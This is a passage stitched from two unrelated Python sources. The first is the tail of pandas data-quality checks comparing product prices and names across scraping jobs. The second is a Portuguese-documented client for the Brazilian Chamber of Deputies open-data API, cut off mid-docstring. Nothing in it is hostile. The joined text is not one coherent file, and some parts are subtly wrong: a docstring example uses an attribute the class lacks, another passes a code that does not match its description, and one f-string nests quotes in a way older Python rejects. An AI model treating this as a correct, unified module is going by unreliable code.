f"of items with {price_was_field} = {price_field}"
),
detailed=(
f"Prices equal for {len(df_prices_equals)} items:\n"
f"{list(df_prices_equals['_key'])}"
),
)
result.err_items_count = len(df_prices_equals) + len(df_prices_less)
result.items_count = len(df.index)
else:
result.add_info(
"product_price_field or product_price_was_field tags were not "
"found in schema"
)
return result
def compare_prices_for_same_urls(
source_df: pd.DataFrame, target_df: pd.DataFrame, tagged_fields: TaggedFields
):
"""For each pair of items that have the same `product_url_field` tagged field,
compare `product_price_field` field
Returns:
A result containing pairs of items with same `product_url_field`
from `source_df` and `target_df` which `product_price_field` differ,
missing and new `product_url_field` tagged fields.
"""
result = Result("Compare Prices For Same Urls")
url_field = tagged_fields.get("product_url_field")
if not url_field:
result.add_info("product_url_field tag is not set")
return result
url_field = url_field[0]
price_field = tagged_fields.get("product_price_field")
source_df = source_df.dropna(subset=[url_field])
target_df = target_df.dropna(subset=[url_field])
same_urls = source_df[(source_df[url_field].isin(target_df[url_field].values))][
url_field
]
new_urls = source_df[~(source_df[url_field].isin(target_df[url_field].values))][
url_field
]
missing_urls = target_df[(~target_df[url_field].isin(source_df[url_field].values))][
url_field
]
missing_detailed_messages = []
for url in missing_urls:
key = target_df.loc[target_df[url_field] == url]["_key"].iloc[0]
missing_detailed_messages.append(f"Missing {url} from {key}")
result.add_info(
f"{len(missing_urls)} urls missing from the tested job",
detailed="\n".join(missing_detailed_messages),
)
result.add_info(f"{len(new_urls)} new urls in the tested job")
result.add_info(f"{len(same_urls)} same urls in both jobs")
diff_prices_count = 0
if not price_field:
result.add_info("product_price_field tag is not set")
else:
price_field = price_field[0]
detailed_messages = []
for url in same_urls:
if url.strip() != "nan":
source_price = source_df[source_df[url_field] == url][price_field].iloc[
0
]
target_price = target_df[target_df[url_field] == url][price_field].iloc[
0
]
if (
is_number(source_price)
and is_number(target_price)
and ratio_diff(source_price, target_price) > 0.1
):
diff_prices_count += 1
source_key = source_df[source_df[url_field] == url]["_key"].iloc[0]
target_key = target_df[target_df[url_field] == url]["_key"].iloc[0]
msg = (
f"different prices for url: {url}\nsource price is {source_price} "
f"for {source_key}\ntarget price is {target_price} for {target_key}"
)
detailed_messages.append(msg)
res = f"{len(same_urls)} checked, {diff_prices_count} errors"
if detailed_messages:
result.add_error(res, detailed="\n".join(detailed_messages))
else:
result.add_info(res)
return result
def compare_names_for_same_urls(
source_df: pd.DataFrame, target_df: pd.DataFrame, tagged_fields: TaggedFields
):
"""For each pair of items that have the same `product_url_field` tagged field,
compare `name_field` field"""
result = Result("Compare Names Per Url")
url_field = tagged_fields.get("product_url_field")
if not url_field:
result.add_info("product_url_field tag is not set")
return result
url_field = url_field[0]
name_field = tagged_fields.get("name_field")
diff_names_count = 0
if not name_field:
result.add_info("name_field tag is not set")
return result
name_field = name_field[0]
if any(
[
name_field not in source_df.columns.values,
name_field not in target_df.columns.values,
]
):
return
same_urls = source_df[(source_df[url_field].isin(target_df[url_field].values))][
url_field
]
detailed_messages = []
for url in same_urls:
if url.strip() != "nan":
source_name = source_df[source_df[url_field] == url][name_field].iloc[0]
target_name = target_df[target_df[url_field] == url][name_field].iloc[0]
if (
source_name != target_name
and source_name.strip() != "nan"
and target_name.strip() != "nan"
):
diff_names_count += 1
source_key = source_df[source_df[url_field] == url]["_key"].iloc[0]
target_key = target_df[target_df[url_field] == url]["_key"].iloc[0]
msg = (
f"different names for url: {url}\nsource name is {source_name} "
f"for {source_key}\ntarget name is {target_name} for {target_key}"
)
detailed_messages.append(msg)
res = f"{len(same_urls)} checked, {diff_names_count} errors"
if detailed_messages:
result.add_error(res, detailed="\n".join(detailed_messages))
else:
result.add_info(res)
return result
def compare_prices_for_same_names(
source_df: pd.DataFrame, target_df: pd.DataFrame, tagged_fields: TaggedFields
):
result = Result("Compare Prices For Same Names")
name_field = tagged_fields.get("name_field")
if not name_field:
result.add_info("name_field tag is not set")
return result
name_field = name_field[0]
product_url_field = tagged_fields.get("product_url_field")
if not product_url_field:
result.add_info("product_url_field tag is not set")
else:
product_url_field = product_url_field[0]
source_df = source_df[source_df[name_field].notnull()]
target_df = target_df[target_df[name_field].notnull()]
same_names = source_df[(source_df[name_field].isin(target_df[name_field].values))][
name_field
]
new_names = source_df[~(source_df[name_field].isin(target_df[name_field].values))][
name_field
]
missing_names = target_df[
~(target_df[name_field].isin(source_df[name_field].values))
][name_field]
detailed_messages = []
for name in missing_names:
target_key = target_df.loc[target_df[name_field] == name]["_key"].iloc[0]
msg = f"Missing {name} from {target_key}"
if product_url_field:
url = target_df.loc[target_df[name_field] == name][product_url_field].iloc[
0
]
detailed_messages.append(f"{msg}\n{url}")
result.add_info(
f"{len(missing_names)} names missing from the tested job",
detailed="\n".join(detailed_messages),
)
result.add_info(f"{len(new_names)} new names in the tested job")
result.add_info(f"{len(same_names)} same names in both jobs")
price_tag = "product_price_field"
price_field = tagged_fields.get(price_tag)
if not price_field:
result.add_info("product_price_field tag is not set")
return result
price_field = price_field[0]
count = 0
detailed_messages = []
for name in same_names:
if name.strip() != "nan":
source_price = source_df[source_df[name_field] == name][price_field].iloc[0]
target_price = target_df[target_df[name_field] == name][price_field].iloc[0]
if is_number(source_price) and is_number(target_price):
if ratio_diff(source_price, target_price) > 0.1:
count += 1
source_key = source_df[source_df[name_field] == name]["_key"].iloc[
0
]
target_key = target_df[target_df[name_field] == name]["_key"].iloc[
0
]
msg = (
f"different price for {name}\nsource price is {source_price} "
f"for {source_key}\ntarget price is {target_price} for {target_key}"
)
detailed_messages.append(msg)
result_msg = f"{len(same_names)} checked, {count} errors"
if detailed_messages:
result.add_error(result_msg, detailed="\n".join(detailed_messages))
else:
result.add_info(result_msg)
return result
|
'''
Módulo para captura dos dados abertos da Câmara dos Deputados do Brasil.
Mini-Tutorial
-------------
1. Importe o módulo `camara`.
>>> from DadosAbertosBrasil import camara
2. Busque o código do objeto de estudo utilizando as funções `lista`.
>>> camara.lista_deputados( ... )
3. Instancie o objeto de estudo utilizando o código encontrado.
>>> dep = camara.Deputado(cod)
4. Utilize os atributos da classe para obter informações básicas do objeto.
>>> dep.dados
5. Utilize os métodos da classe para obter informações detalhadas do objeto.
>>> dep.despesas( ... )
Documentação da API original
----------------------------
https://dadosabertos.camara.leg.br/swagger/api.html
'''
import pandas as _pd
from ._utils import parse
from ._utils.get_data import get_data
def _get(
path: str,
params: dict = None
) -> dict:
return get_data(
endpoint = 'https://dadosabertos.camara.leg.br/api/v2/',
path = path,
params = params
)
def _df(
dados: dict,
index_col: str = None
) -> _pd.DataFrame:
'''
Converte dados brutos da API em um DataFrame.
Parâmetros
----------
dados : dict
Dados brutos da API.
index_col : str (default=None)
Nome da coluna que será usada como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Dados convertidos em DataFrame.
'''
df = _pd.DataFrame(dados['dados'])
if (index_col is not None) and (not df.empty):
df.set_index(index_col, inplace=True)
return df
class Bloco:
'''
Informações sobre um bloco partidário específico.
Parâmetros
----------
cod: int
Código numérico do bloco partidário do qual se deseja informações.
Atributos
---------
dados : dict
Conjunto completo de dados.
cod : int
Código numérico do bloco partidário.
legislatura : str
Legislatura do bloco partidário.
nome : str
Nome do bloco partidário.
uri : str
Endereço para coleta de dados direta pela API do bloco partidário.
Exemplos
--------
Obter o nome do bloco #576.
>>> bl = camara.Bloco(cod=576)
>>> bl.nome
... 'PSL, PTB'
--------------------------------------------------------------------------
'''
def __init__(self, cod:int):
self.cod = cod
self.dados = _get(['blocos', str(cod)])['dados']
self.legislatura = self.dados['idLegislatura']
self.nome = self.dados['nome']
self.uri = self.dados['uri']
def __repr__(self):
return f"DadosAbertosBrasil.camara: Bloco {self.nome}"
class Deputado:
'''
Retorna os dados cadastrais de um parlamentar que, em algum momento
da história e por qualquer período, entrou em exercício na Câmara.
Parâmetros
----------
cod : int
Código do parlamentar.
Atributos
---------
dados : dict
Conjunto completo de dados.
cod : int
Código de identificação.
condicao_eleitoral : str
Condição eleitoral.
cpf : str
Número do CPF.
descricao_status : str
Descrição do último status.
email : str
E-mail.
escolaridade : str
Escolaridade.
falecimento : str
Data de falecimento no formato 'AAAA-MM-DD'.
Retorna vazio caso o parlamentar não tenha falecido.
foto : str
URL da foto.
gabinete : dict
Informações de identificação e contato do gabinete.
legislatura : int
ID da legislatura mais recente.
municipio_nascimento : str
Município de nascimento.
nascimento : str
Data de nascimento no formato 'AAAA-MM-DD'.
nome : str
Nome mais comum.
nome_completo : str
Nome civil completo.
nome_eleitoral : str
Nome utilizado na campanha eleitoral.
partido : str
Último partido.
rede_social : list
Lista de nomes em redes sociais.
sexo : str
- 'M': Masculino;
- 'F': Feminino.
situacao : str
Situação do último status.
uf : str
Sigla da Unidade Federativa pela qual foi eleito.
uf_nascimento : str
Unidade Federativa de nascimento.
ultima_atualizacao : str
Dia e horário da última atualização de status.
uri : str
Endereço para coleta de dados direta pela API.
website : str
Website.
Exemplos
--------
Coletar partido mais recente do deputado Rodrigo Maia.
>>> cod = 74693 # Código do deputado
>>> dep = camara.Deputado(cod=cod)
>>> dep.partido
... 'DEM'
--------------------------------------------------------------------------
'''
def __init__(self, cod:int):
self.cod = cod
self.dados = _get(['deputados', str(cod)])['dados']
self.condicao_eleitoral = self.dados['ultimoStatus']['condicaoEleitoral']
self.cpf = self.dados['cpf']
self.descricao_status = self.dados['ultimoStatus']['descricaoStatus']
self.email = self.dados['ultimoStatus']['email']
self.escolaridade = self.dados['escolaridade']
self.falecimento = self.dados['dataFalecimento']
self.foto = self.dados['ultimoStatus']['urlFoto']
self.gabinete = self.dados['ultimoStatus']['gabinete']
self.legislatura = self.dados['ultimoStatus']['idLegislatura']
self.municipio_nascimento = self.dados['municipioNascimento']
self.nascimento = self.dados['dataNascimento']
self.nome = self.dados['ultimoStatus']['nome']
self.nome_completo = self.dados['nomeCivil']
self.nome_eleitoral = self.dados['ultimoStatus']['nomeEleitoral']
self.partido = self.dados['ultimoStatus']['siglaPartido']
self.rede_social = self.dados['redeSocial']
self.sexo = self.dados['sexo']
self.situacao = self.dados['ultimoStatus']['situacao']
self.uf = self.dados['ultimoStatus']['siglaUf']
self.uf_nascimento = self.dados['ufNascimento']
self.ultima_atualizacao = self.dados['ultimoStatus']['data']
self.uri = self.dados['uri']
self.website = self.dados['urlWebsite']
def __repr__(self):
return f"DadosAbertosBrasil.camara: Deputad{"a" if self.sexo == "F" else "o"} {self.nome_eleitoral}"
def despesas(
self,
legislatura: int = None,
ano: int = None,
mes: int = None,
fornecedor: int = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'ano'
) -> _pd.DataFrame:
'''
As despesas com exercício parlamentar do deputado.
Dá acesso aos registros de pagamentos e reembolsos feitos pela Câmara
em prol do deputado, a título da Cota para Exercício da Atividade
Parlamentar, a chamada "cota parlamentar".
Se não forem passados os parâmetros de tempo, o serviço retorna os
dados dos seis meses anteriores à requisição.
Parâmetros
----------
legislatura : int (default=None)
ID da legislatura em que tenham ocorrido as despesas.
ano : int (default=None)
Ano de ocorrência das despesas.
mes : int (default=None)
Número do mês de ocorrência das despesas.
fornecedor : int (default=None)
CNPJ de uma pessoa jurídica, ou CPF de uma pessoa física,
fornecedora do produto ou serviço (apenas números).
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com
esta requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='ano')
Nome do campo pelo qual a lista deverá ser ordenada:
qualquer um dos campos do retorno, e também idLegislatura.
Retorna
-------
pandas.core.frame.DataFrame
Lista de despesas com exercício parlamentar do deputado.
----------------------------------------------------------------------
'''
params = {}
if legislatura is not None:
params['idLegislatura'] = legislatura
if ano is not None:
params['ano'] = ano
if mes is not None:
params['mes'] = mes
if fornecedor is not None:
params['cnpjCpfFornecedor'] = fornecedor
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
path = ['deputados', str(self.cod), 'despesas']
dados = _get(path=path, params=params)
return _df(dados)
def discursos(
self,
legislatura: int = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'dataHoraInicio'
) -> _pd.DataFrame:
'''
Os discursos feitos por um deputado em eventos diversos.
Retorna uma lista de informações sobre os pronunciamentos feitos
pelo deputado que tenham sido registrados, em quaisquer eventos,
nos sistemas da Câmara.
Caso os parâmetros de tempo não sejam configurados na requisição,
são buscados os discursos ocorridos nos sete dias anteriores ao
da requisição.
Parâmetros
----------
legislatura : int (default=None)
Número da legislatura a qual os dados buscados devem corresponder.
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='dataHoraInicio')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
Retorna
-------
pandas.core.frame.DataFrame
Lista de discursos feitos por um deputado em eventos diversos.
----------------------------------------------------------------------
'''
params = {}
if legislatura is not None:
params['idLegislatura'] = legislatura
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
path = ['deputados', str(self.cod), 'discursos']
dados = _get(path=path, params=params)
return _df(dados)
def eventos(
self,
legislatura: int = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'dataHoraInicio',
index: bool = False
) -> _pd.DataFrame:
'''
Uma lista de eventos com a participação do parlamentar.
Retorna uma lista de objetos evento nos quais a participação do
parlamentar era ou é prevista.
Se não forem passados parâmetros de tempo, são retornados os eventos
num período de cinco dias, sendo dois antes e dois depois do dia da
requisição.
Parâmetros
----------
legislatura : int (default=None)
Número da legislatura a qual os dados buscados devem corresponder.
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='dataHoraInicio')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de discursos feitos por um deputado em eventos diversos.
----------------------------------------------------------------------
'''
params = {}
if legislatura is not None:
params['idLegislatura'] = legislatura
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
path = ['deputados', str(self.cod), 'eventos']
dados = _get(path=path, params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def frentes(
self,
index: bool = False
) -> _pd.DataFrame:
'''
As frentes parlamentares das quais um deputado é integrante.
Retorna uma lista de informações básicas sobre as frentes
parlamentares das quais o parlamentar seja membro, ou, no caso de
frentes existentes em legislaturas anteriores, tenha encerrado a
legislatura como integrante.
Parâmetros
----------
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de frentes parlamentares das quais um deputado é integrante.
----------------------------------------------------------------------
'''
path = ['deputados', str(self.cod), 'frentes']
dados = _get(path=path, params=None)
index_col = 'id' if index else None
return _df(dados, index_col)
def orgaos(
self,
legislatura: int = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'dataInicio',
index: bool = False
) -> _pd.DataFrame:
'''
Os órgãos dos quais um deputado é integrante.
Retorna uma lista de órgãos, como as comissões e procuradorias,
dos quais o deputado participa ou participou durante um intervalo
de tempo.
Cada item identifica um órgão, o cargo ocupado pelo parlamentar neste
órgão (como presidente, vice-presidente, titular ou suplente) e as
datas de início e fim da ocupação deste cargo.
Se não for passado algum parâmetro de tempo, são retornados os órgãos
ocupados pelo parlamentar no momento da requisição. Neste caso a
lista será vazia se o deputado não estiver em exercício.
Parâmetros
----------
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='dataInicio')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `idOrgao` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista dos órgãos dos quais um deputado é integrante.
----------------------------------------------------------------------
'''
params = {}
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
path = ['deputados', str(self.cod), 'orgaos']
dados = _get(path=path, params=params)
index_col = 'idOrgao' if index else None
return _df(dados, index_col)
class Evento:
'''
Retorna um conjunto detalhado de informações sobre o evento da Câmara.
Parâmetros
----------
cod : int
Código numérico do evento do qual se deseja informações.
Atributos
---------
dados : dict
Conjunto completo de dados.
cod : int
Código numérico do evento.
andar : str
Andar do prédio onde ocorreu o evento.
descricao : str
Descrição do evento.
descricao_tipo : str
Tipo do evento.
fases : str
Fases do evento.
fim : str
Data e horário que o evento foi finalizado no formato 'AAAA-MM-DD'.
inicio : str
Data e horário que o evento foi iniciado no formato 'AAAA-MM-DD'.
local : str
Local onde ocorreu o evento.
local_externo : str
Local externo do evento.
lista_orgaos : list of dict
Lista de orgãos e informações sobre os mesmos.
predio : str
Prédio que ocorreu o evento.
requerimentos : list of dict
Requerimentos do evento.
sala : str
Sala do prédio onde ocorreu o evento.
situacao : str
Situação do evento.
uri : str
Endereço para coleta de dados direta pela API do evento.
uri_convidados : str
Endereço para coleta de dados direta pela API dos convidados.
uri_deputados : str
Endereço para coleta de dados direta pela API dos deputados.
url_documento_pauta : str
Endereço URL para visualizar a pauta do evento.
url_registro : str
Endereço URL onde o evento foi registrado.
Exemplos
--------
Obter a URL para assistir ao evento #59265.
>>> ev = camara.Evento(cod=59265)
>>> ev.url_registro
... 'https://www.youtube.com/watch?v=8D2gjMrTnMA'
--------------------------------------------------------------------------
'''
def __init__(self, cod:int):
self.cod = cod
self.dados = _get(['eventos', str(cod)])['dados']
self.andar = self.dados['localCamara']['andar']
self.descricao = self.dados['descricao']
self.descricao_tipo = self.dados['descricaoTipo']
self.fases = self.dados['fases']
self.fim = self.dados['dataHoraFim']
self.inicio = self.dados['dataHoraInicio']
self.local = self.dados['localCamara']['nome']
self.local_externo = self.dados['localExterno']
self.lista_orgaos = self.dados['orgaos']
self.predio = self.dados['localCamara']['predio']
self.requerimentos = self.dados['requerimentos']
self.sala = self.dados['localCamara']['sala']
self.situacao = self.dados['situacao']
self.uri = self.dados['uri']
self.uri_convidados = self.dados['uriConvidados']
self.uri_deputados = self.dados['uriDeputados']
self.url_documento_pauta = self.dados['urlDocumentoPauta']
self.url_registro = self.dados['urlRegistro']
def __repr__(self):
return f"DadosAbertosBrasil.camara: Evento {self.descricao}"
def deputados(
self,
index: bool = False
) -> _pd.DataFrame:
'''
Os deputados participantes de um evento específico.
Retorna uma lista de dados resumidos sobre deputados participantes do
evento. Se o evento já ocorreu, a lista identifica os deputados que
efetivamente registraram presença no evento. Se o evento ainda não
ocorreu, a lista mostra os deputados que devem participar do evento,
por serem convidados ou por serem membros do(s) órgão(s) responsável
pelo evento.
Parâmetros
----------
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista dos deputados participantes de um evento específico.
----------------------------------------------------------------------
'''
path = ['eventos', str(self.cod), 'deputados']
dados = _get(path=path, params=None)
index_col = 'id' if index else None
return _df(dados, index_col)
def orgaos(
self,
index: bool = False
) -> _pd.DataFrame:
'''
Lista de órgãos organizadores do evento.
Retorna uma lista em que cada item é um conjunto mínimo de dados sobre
o(s) órgão(s) responsável(is) pelo evento.
Parâmetros
----------
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de órgãos organizadores do evento.
----------------------------------------------------------------------
'''
path = ['eventos', str(self.cod), 'orgaos']
dados = _get(path=path, params=None)
index_col = 'id' if index else None
return _df(dados, index_col)
def pauta(
self,
index: bool = False
) -> _pd.DataFrame:
'''
Lista de proposições que foram ou deverão ser avaliadas em um evento
de caráter deliberativo.
Se o evento for de caráter deliberativo (uma reunião ordinária,
por exemplo) este serviço retorna a lista de proposições previstas
para avaliação pelos parlamentares. Cada item identifica, se as
informações estiverem disponíveis, a proposição avaliada, o regime
de preferência para avaliação, o relator e seu parecer, o resultado
da apreciação e a votação realizada.
Parâmetros
----------
index : bool (default=False)
Se True, define a coluna `ordem` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de proposições do evento.
----------------------------------------------------------------------
'''
path = ['eventos', str(self.cod), 'pauta']
dados = _get(path=path, params=None)
index_col = 'ordem' if index else None
return _df(dados, index_col)
def votacoes(
self,
index: bool = False
) -> _pd.DataFrame:
'''
Informações detalhadas de votações sobre o evento.
Retorna uma lista de dados básicos sobre votações que tenham sido
realizadas no evento. Votações só ocorrem em eventos de caráter
deliberativo. Dados complementares sobre cada votação listada podem
ser obtidos no recurso.
Parâmetros
----------
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de de votações sobre o evento.
----------------------------------------------------------------------
'''
path = ['eventos', str(self.cod), 'votacoes']
dados = _get(path=path, params=None)
index_col = 'id' if index else None
return _df(dados, index_col)
class Frente:
'''
Informações detalhadas sobre uma frente parlamentar.
Parâmetros
----------
cod : int
Código numérico da frente parlamentar da qual se deseja informações.
Atributos
---------
dados : dict
Conjunto completo de dados.
cod : int
Código numérico da frente parlamentar.
coordenador : dict
Informações do(a) coordenador(a) da frente parlamentar.
documento : str
URL do documento da frente parlamentar.
email : str
E-mail de contato.
id_sitacao : int
ID da situação da frente parlamentar.
keywords : str
Palavras-chaves da frente parlamentar.
legislatura : int
ID da legislatura da frente parlamentar.
situacao : str
Situação da frente parlamentar.
telefone : str
Telefone de contato.
titulo : str
Título da frente parlamentar.
uri : str
Endereço para coleta de dados direta pela API da frente parlamentar.
website : str
URL do website da frente parlamentar.
Exemplos
--------
Obter título da frente parlamentar #54258.
>>> fr = camara.Frente(cod=54258)
>>> fr.url_registro
... 'Frente Parlamentar Mista da Telessaúde'
--------------------------------------------------------------------------
'''
def __init__(self, cod:int):
self.cod = cod
self.dados = _get(['frentes', str(cod)])['dados']
self.coordenador = self.dados['coordenador']
self.documento = self.dados['urlDocumento']
self.email = self.dados['email']
self.id_sitacao = self.dados['idSituacao']
self.keywords = self.dados['keywords']
self.legislatura = self.dados['idLegislatura']
self.situacao = self.dados['situacao']
self.telefone = self.dados['telefone']
self.titulo = self.dados['titulo']
self.uri = self.dados['uri']
self.website = self.dados['urlWebsite']
def __repr__(self):
return f"DadosAbertosBrasil.camara: {self.titulo}"
def membros(
self,
index: bool = False
) -> _pd.DataFrame:
'''
Os deputados que participam da frente parlamentar.
Uma lista dos deputados participantes da frente parlamentar e os
papéis que exerceram nessa frente (signatário, coordenador ou
presidente). Observe que, mesmo no caso de frentes parlamentares
mistas (compostas por deputados e senadores), são retornados apenas
dados sobre os deputados.
Parâmetros
----------
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista dos deputados que participam da frente parlamentar.
----------------------------------------------------------------------
'''
path = ['frentes', str(self.cod), 'membros']
dados = _get(path=path, params=None)
index_col = 'id' if index else None
return _df(dados, index_col)
class Legislatura:
'''
Informações extras sobre uma determinada legislatura da Câmara.
Parâmetros
----------
cod : int
Código numérico da legislatura da qual se deseja informações.
Atributos
---------
dados : dict
Conjunto completo de dados.
cod : int
Código numérico da legislatura.
inicio : str
Primeiro dia da legislatura.
fim : str
Último dia da legislatura.
uri : str
Endereço para coleta de dados direta pela API da legislatura.
Exemplos
--------
Obter o primeiro e último dia da legislatura #56.
>>> leg = camara.Legislatura(cod=54)
>>> leg.inicio
... '2011-02-01'
>>> leg.fim
... '2015-01-31'
--------------------------------------------------------------------------
'''
def __init__(self, cod:int):
self.cod = cod
self.dados = _get(['legislaturas', str(cod)])['dados']
self.fim = self.dados['dataFim']
self.inicio = self.dados['dataInicio']
self.uri = self.dados['uri']
def __repr__(self):
return f"DadosAbertosBrasil.camara: Legislatura {self.cod}"
def mesa(
self,
inicio: str = None,
fim: str = None,
index: bool = False
) -> _pd.DataFrame:
'''
Quais deputados fizeram parte da Mesa Diretora em uma legislatura.
Retorna uma lista com dados básicos sobre todos os deputados que
ocuparam algum posto na Mesa Diretora da Câmara em algum período de
tempo dentro da legislatura. Normalmente, cada legislatura tem duas
Mesas Diretoras, com presidente, dois vice-presidentes, quatro
secretários parlamentares e os suplentes dos secretários.
Parâmetros
----------
inicio : str (default=None)
Dia de início do intervalo de tempo do qual se deseja saber a
composição da Mesa, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término do intervalo de tempo do qual se deseja saber a
composição da Mesa, no formato 'AAAA-MM-DD'.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista dos deputados que participam da frente parlamentar.
----------------------------------------------------------------------
'''
params = {}
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
path = ['legislaturas', str(self.cod), 'mesa']
dados = _get(path=path, params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
class Orgao:
'''
Informações detalhadas sobre um órgão da Câmara.
Parâmetros
----------
cod : int
Código numérico do órgão do qual se deseja informações.
Atributos
---------
dados : dict
Conjunto completo de dados.
cod : int
Código numérico do órgão.
apelido : str
Apelido do órgão.
casa : str
Casa do órgão.
cod_tipo : int
Código do tipo do órgão.
fim : str
Data final do órgão.
inicio : str
Data inicial do órgão.
instalacao : str
Data de instalação do órgão.
nome : str
Nome do órgão.
nome_publicacao : str
Nome de publicação.
sala : str
Sala do órgão.
sigla : str
Sigla do órgão.
tipo : str
Tipo do órgão.
uri : str
Endereço para coleta de dados direta pela API do órgão.
urlWebsite : str
URL para acessar o website do órgão.
Exemplos
--------
Obter o apelido do órgão #4.
>>> org = camara.Orgao(cod=4)
>>> org.apelido
... 'Mesa Diretora'
--------------------------------------------------------------------------
'''
def __init__(self, cod:int):
self.cod = cod
self.dados = _get(['orgaos', str(cod)])['dados']
self.apelido = self.dados['apelido']
self.casa = self.dados['casa']
self.cod_tipo = self.dados['codTipoOrgao']
self.fim = self.dados['dataFim']
self.inicio = self.dados['dataInicio']
self.instalacao = self.dados['dataInstalacao']
self.nome = self.dados['nome']
self.nome_publicacao = self.dados['nomePublicacao']
self.sala = self.dados['sala']
self.sigla = self.dados['sigla']
self.tipo = self.dados['tipoOrgao']
self.uri = self.dados['uri']
self.urlWebsite = self.dados['urlWebsite']
def __repr__(self):
return f"DadosAbertosBrasil.camara: Órgão {self.nome}"
def eventos(
self,
tipo_evento: str = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'dataHoraInicio',
index: bool = False
) -> _pd.DataFrame:
'''
Os eventos ocorridos ou previstos em um órgão legislativo.
Retorna uma lista de informações resumidas dos eventos realizados
(ou a realizar) pelo órgão legislativo. Por padrão, são retornados
eventos em andamento ou previstos para o mesmo dia, dois dias antes
e dois dias depois da requisição. Parâmetros podem ser passados para
alterar esse período, bem como os tipos de eventos.
Parâmetros
----------
tipo_evento : str (default=None)
Identificador numérico do tipo de evento que se deseja obter.
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
